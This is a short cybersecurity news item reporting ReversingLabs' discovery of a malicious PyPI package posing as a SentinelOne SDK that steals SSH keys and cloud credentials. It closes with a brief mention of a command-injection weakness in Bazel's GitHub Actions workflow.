SecurityWeek reports that a malicious PyPi package masquerading as a SentinelOne software development kit is being used in a new supply chain attack aimed at distributing a backdoor code for data theft.
ReversingLabs researchers discovered that malicious code has been embedded within two api.py files alone, with the backdoor aimed at exfiltrating shell command execution history and SSH folder contents, including SSH keys and configuration data such as AWS, Git, and Kubernetes credentials. Root directory folders are also being listed by the malware, which delivers the collected information to the attackers' command-and-control server.
"The malicious code appears designed to siphon sensitive information from development environments. Based on our analysis of the malware and the associated C&C infrastructure, it is unclear if this package was or is being used in active attacks against development environments, due to a lack of evidence found. The download stats suggest that the package has been downloaded more than 1,000 times," said ReversingLabs.
A GitHub Actions workflow could have been used for a command injection vulnerability in Bazel, which had the potential for threat actors to add malicious code into the production environment for projects using the Google open-source product.